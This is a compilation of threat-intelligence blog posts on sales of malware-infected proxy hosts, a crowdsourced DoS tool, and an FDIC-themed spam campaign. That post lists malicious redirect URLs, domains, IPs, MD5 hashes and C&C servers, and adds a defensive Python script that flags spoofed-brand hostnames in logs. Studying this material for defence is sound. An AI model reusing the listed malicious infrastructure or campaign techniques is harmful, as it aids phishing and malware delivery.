Naturally, there are vendors whose sole objective is to ‘innovate’, in this case by rebooting the life cycle of a popular anonymization concept known as ‘proxy-chaining’: connecting through multiple compromised hosts in sequence, in an attempt to decrease the chances of successful attribution of a particular attack. Due to the persistent demand for Socks4/Socks5/HTTP-based compromised hosts, we expect to continue observing a steady supply of new hosts, with vendors differentiating their propositions in an attempt to occupy a market-leading share of this in-demand segment.

The post Yet another ‘malware-infected hosts as anonymization stepping stones’ service offering access to hundreds of compromised hosts spotted in the wild appeared first on Webroot Threat Blog.

Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based DIY DoS tool

Based on historical evidence gathered during some of the major ‘opt-in botnet’ crowdsourced DDoS (distributed denial of service) attack campaigns of the last couple of years, the distribution of point’n’click DIY DoS (denial of service) tools continues to represent a major driving force behind the success of these campaigns. A newly released DIY DoS tool aims to empower technically unsophisticated users to launch DDoS attacks by simultaneously utilizing an unlimited number of publicly/commercially obtainable Socks4/Socks5/HTTP malware-infected hosts, more commonly known as proxies.

Sample screenshot of the DIY DoS (Denial of Service) tool (image not reproduced here).

Sample visualization of the DIY DoS (Denial of Service) tool in action using logstalgia (image not reproduced here).

Despite the fact that the tool lacks diverse DDoS attack methods, as well as a web-based/server-based C&C (command and control) infrastructure, it can still prove to be a powerful tool in the hands of tens of thousands of users recruited/socially engineered into participating in a crowdsourced DDoS attack campaign, especially in combination with the fact that we continue to observe new entrants into the market for malware-infected hosts converted into Socks4/Socks5/HTTP proxies. As always, we’ll keep an eye on its future development and post updates as soon as any significant updates are introduced.

The post Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based DIY DoS tool appeared first on Webroot Threat Blog.

Cybercriminals sell access to tens of thousands of malware-infected Russian hosts

Today’s cybercrime ecosystem offers everything a novice cybercriminal needs to quickly catch up with more sophisticated peers. Segmented and geolocated lists of harvested emails, managed services performing the actual spamming, and DIY undetectable malware-generating tools all result in a steady influx of new (underground) market entrants, whose activities directly contribute to the overall growth of the cybercrime ecosystem. Among the questions the general public most often asks about cybercrime is: what else, besides money, acts as a key driving force behind these malicious and fraudulent activities? Plain and simple greed, especially in those situations where Russian/Eastern European cybercriminals purposely sell access to Russian/Eastern European malware-infected hosts, degrading the OPSEC (Operational Security) of their campaigns by attracting the attention of local law enforcement.

In this post, I’ll discuss yet another such service offering access to Russian malware-infected hosts, and emphasize the cybercriminal’s business logic to target Russian users.

Sample screenshot of the service’s advertisement:

[Image: advertisement for malware-infected hosts for sale, Russia/Eastern Europe/world mix]

The service is currently offering access to malware-infected hosts based in Russia ($200 for 1,000 hosts), the United Kingdom ($240 for 1,000 hosts), the United States ($180 for 1,000 hosts), France ($200 for 1,000 hosts), Canada ($270 for 1,000 hosts) and an international mix ($35 for 1,000 hosts), with a daily supply limit of 20,000 hosts, indicating an ongoing conversion of legitimate/hijacked traffic into malware-infected hosts. We believe that the availability of Russia-based malware-infected hosts is the direct result of either a greed-oriented underground market proposition, a surplus-based proposition, or an attempt by the cybercriminal behind the offer to differentiate their proposition from the rest of the commoditized services offering access to, for instance, U.S.-based hosts.

We’ll continue monitoring the service, and post updates as soon as new features — if any — are introduced.

The post Cybercriminals sell access to tens of thousands of malware-infected Russian hosts appeared first on Webroot Threat Blog.

Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware


Cybercriminals are mass mailing tens of thousands of malicious Federal Deposit Insurance Corporation (FDIC) themed emails, in an attempt to trick users into clicking on the client-side-exploit-serving and malware-dropping URLs found in the bogus emails. Let’s dissect the campaign, expose the portfolio of malicious domains using it, provide MD5s for a sample exploit and the dropped malware, and connect the campaign with previously launched and already profiled malicious campaigns.

Sample screenshot of the spamvertised email:

[Image: spamvertised FDIC-themed email used in the campaign]

Sample redirection chain:
hxxp://stranniki-music.ru/insurance.problem.html (62.173.142.30)
-> hxxp://www.fdic.gov.horse-mails.net/news/fdic-insurance.php (174.142.186.89; 216.218.208.55; 109.71.136.140; 37.221.163.174; 95.111.32.249) – Email: comicmotors@writeme.com

Known to have responded to the same IP (174.142.186.89) are also the following fraudulent/malicious domains:
airfare-ticketscheap.com
cernanrigndnisne55.net
demuronline.net
facebook.com.achrezervations.com
fdic.gov.horse-mails.net
fiscdp.com.airfare-ticketscheap.com
gormonigraetnapovalahule26.net
irs.gov.successsaturday.net
nacha.org.demuronline.net
nacha.org.multiachprocessor.com
nacha.org.samsung-galaxy-games.net
pidrillospeeder.com
samsung-galaxy-games.net
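Several of the domains above share one pattern: a trusted brand's registrable domain (fdic.gov, irs.gov, nacha.org, facebook.com) is placed as a leading subdomain of an attacker-controlled domain, so the hostname reads convincingly in an email while resolving wherever the attacker chooses. The following Python script is an added example (not Webroot's code) that flags this pattern in web-proxy log lines. The log lines, the trusted-domain list and the minimal public-suffix stand-in are constructed assumptions for illustration; in production, derive the registrable domain from the real Public Suffix List (for example via the `tldextract` package).

```python
"""Flag hostnames that embed a trusted brand domain as a leading subdomain.

Added example, not Webroot's code. Given hostnames pulled from web-proxy or
DNS logs, report any whose labels start with a trusted registrable domain
(e.g. "fdic.gov") while the hostname's own registrable domain is something
else, as in fdic.gov.horse-mails.net. Sample log lines, the trusted-domain
list and the suffix table below are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Brands impersonated in the campaign discussed above; extend per your org.
TRUSTED_DOMAINS = {"fdic.gov", "irs.gov", "nacha.org", "facebook.com"}

# Minimal stand-in for the Public Suffix List: suffixes under which the
# registrable domain is the third label from the right. Use the real PSL
# (e.g. the tldextract package) in production.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp", "com.br"}

HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")
URL_RE = re.compile(r"https?://[^\s\"']+")


def registrable_domain(host: str) -> Optional[str]:
    """Return the registrable (owner-controlled) domain of a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def spoofed_brand(host: str) -> Optional[str]:
    """Return the trusted domain that `host` impersonates, or None."""
    host = host.lower().rstrip(".")
    if not HOST_RE.match(host):
        return None
    reg = registrable_domain(host)
    for brand in TRUSTED_DOMAINS:
        if reg == brand:
            continue  # genuine subdomain of the brand, e.g. www.fdic.gov
        # The brand's labels appear as a dotted prefix inside a foreign domain.
        if host.startswith(brand + ".") or ("." + brand + ".") in host:
            return brand
    return None


@dataclass
class Finding:
    line_no: int
    host: str
    impersonates: str


def scan_proxy_log(lines: Iterable[str]) -> List[Finding]:
    """Extract every URL from each log line and report spoofed-brand hosts."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            host = urlsplit(url).hostname
            if not host:
                continue
            brand = spoofed_brand(host)
            if brand:
                findings.append(Finding(n, host, brand))
    return findings


# Constructed proxy log (timestamp, client, method, URL, status); two lines
# reuse hostnames from the campaign above, the rest are benign.
SAMPLE_LOG = """\
1375300001.001 10.0.0.12 GET http://www.fdic.gov/news/ 200
1375300002.002 10.0.0.12 GET http://www.fdic.gov.horse-mails.net/news/fdic-insurance.php 200
1375300003.003 10.0.0.23 GET http://irs.gov.successsaturday.net/refund.php 200
1375300004.004 10.0.0.23 GET https://nacha.org/rules 200
1375300005.005 10.0.0.31 GET http://example.co.uk/login 200
""".splitlines()

if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.host} impersonates {f.impersonates}")
```

The check deliberately skips hosts whose own registrable domain is the brand (www.fdic.gov is legitimate), and only fires when the brand's labels sit inside a different registrable domain; correctness therefore depends on getting the registrable domain right, which is why the suffix table must come from the real Public Suffix List outside this example.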

The following malicious MD5s are also known to have phoned back to the same IP in the past:
MD5: d672db2c3f398f1bb55ed0030467277d
MD5: 5cb9893095f6087fe741853213f244e8

Known to have responded to 62.173.142.30 are also the following malicious domains:
megapolis-cars.ru
poleznoeda.ru
rutexim.ru
stranniki-music.ru
xn--80ahcajwqeee.xn--p1ai

Known to have responded to 216.218.208.55 are also the following malicious domains:
demuronline.net
samsung-galaxy-games.net

Known to have responded to 95.111.32.249 are also the following malicious domains:
stjamesang.net

Name servers part of the campaign’s infrastructure:
Name Server: NS1.NAMASTELEARNING.NET – 86.64.152.26 – Email: minelapse2001@outlook.com – Deja vu! We’ve already seen the same email used in a related Facebook themed malicious campaign.
Name Server: NS2.NAMASTELEARNING.NET – 205.28.29.52

The same name servers also provide DNS services to the following malicious domains:
achrezervations.com
airfare-ticketscheap.com
children-bicycle.net
demuronline.net
fairfieldpoa.net
fdic-payalert.com
gagcenter.net
horse-mails.net
judicialcrisis.net
lacave-enlignes.com
lindoliveryct.net
multiachprocessor.com
nacha-ach-processor.com
namastelearning.net
oleannyinsurance.net
onsayoga.net
pidrillospeeder.com
protektest.net
samsung-galaxy-games.net
smscente.net
stjamesang.net
successsaturday.net
taltondark.net
thefastor.com
ulsmart.net

MD5 for a sample served client-side exploit: 92897ad0aff69dee36dc22140bf3d8a9
MD5 for the dropped malware: 7b6332de90e25a5b26f7c75910a22e0c

Once executed, the sample phones back to the following C&C servers:
217.34.53.163
213.219.135.107
46.223.150.132
108.218.11.143
75.44.92.13
72.81.0.118
217.35.75.232
81.138.21.57
200.84.149.84
84.59.151.27
86.179.220.43
88.247.80.140
99.114.220.224
99.21.49.32
81.130.51.125
108.210.102.165
108.234.133.110
108.240.232.212
86.142.201.20
71.10.54.162
92.4.217.3
188.129.147.67
68.4.133.127
82.211.142.218
81.133.100.39
173.14.178.233
151.97.100.116
86.11.143.176
68.179.19.29
69.70.121.162
173.63.220.65
79.135.34.53
74.7.151.25
71.48.23.198
85.18.21.33

Webroot SecureAnywhere users are proactively protected from these threats.

The post Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware appeared first on Webroot Threat Blog.

ThreatVlog Episode 6: FBI Ransomware forcing child porn on infected computers
